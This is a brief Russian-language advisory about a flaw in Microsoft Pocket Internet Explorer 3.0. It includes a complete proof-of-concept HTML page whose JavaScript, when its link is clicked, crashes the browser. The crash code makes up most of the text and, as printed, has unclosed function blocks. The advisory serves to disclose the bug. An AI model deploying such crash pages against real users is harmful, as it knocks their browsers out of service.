Обнаруженная уязвимость позволяет злонамеренной Web странице, содержащей некорректный JavaScript код, аварийно завершить работу Microsoft Pocket Internet Explorer. Пример: 

<html> 
<head> 
<title>Crash PIE</title> 
<script language=»Javascript»> 
function displayPage(page){ 
if(page==»onload»){ 
main.innerHTML=»<a href=\»#\» onClick=\»displayPage(‘crash’);\»>Crash 
me</a>»; 

if(page==»crash»){ 
main.innerHTML=»<a href=\»#\» onClick=\»displayPage(‘crash’);\»>You are 
going down!</a>»; 


</script> 
</head> 
<body onLoad=»displayPage(‘onload’);»> 
<hr> 
<span id=»main»></span> 
</body></html> 

Уязвимость обнаружена в Microsoft Pocket Internet Explorer 3.0.

Оставить мнение